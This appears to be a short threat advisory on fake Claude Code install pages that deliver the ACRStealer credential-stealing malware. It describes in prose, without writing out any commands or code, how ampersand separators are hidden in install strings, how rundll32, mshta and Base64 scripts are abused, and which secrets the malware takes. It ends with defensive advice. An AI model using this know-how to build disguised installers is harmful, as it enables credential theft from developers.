Fake Claude Code Installers Deliver Credential-Stealing Malware

The rapid adoption of AI‑assisted development tools has created a lucrative attack surface for cybercriminals. Threat actors are now weaponizing the very documentation developers rely on, using SEO poisoning and paid search placements to surface counterfeit Claude Code install pages. By embedding subtle command separators—such as ampersands—within seemingly benign installation strings, they trigger the ACRStealer malware while allowing the legitimate software to install, effectively masking the breach.

Technical analysis reveals a multi‑stage infection chain. Initial delivery leverages common Windows utilities like rundll32.exe and mshta.exe, as well as Base64‑encoded scripts hosted on GitHub. Once executed, the payload establishes encrypted C2 channels, employs fileless execution techniques, and activates anti‑analysis safeguards. ACRStealer, the core trojan, has evolved to harvest a broad spectrum of credentials: AI platform API keys, cloud service tokens, password‑manager vaults, VPN logins, and even cryptocurrency wallet addresses via a clipboard hijacker. Its ability to rotate delivery methods and infrastructure makes traditional signature‑based defenses less effective.

Mitigating this emerging threat requires a layered approach. Developers should verify installation commands against official vendor sites and scrutinize any unexpected operators before execution. Organizations ought to enforce application control, deploy endpoint detection and response solutions capable of spotting abnormal script activity, and adopt least‑privilege principles with robust privileged‑access management. Centralized secrets management, continuous scanning for exposed keys, and zero‑trust network architectures further reduce the attack surface. By integrating these controls, enterprises can safeguard their AI assets and maintain the integrity of their development pipelines.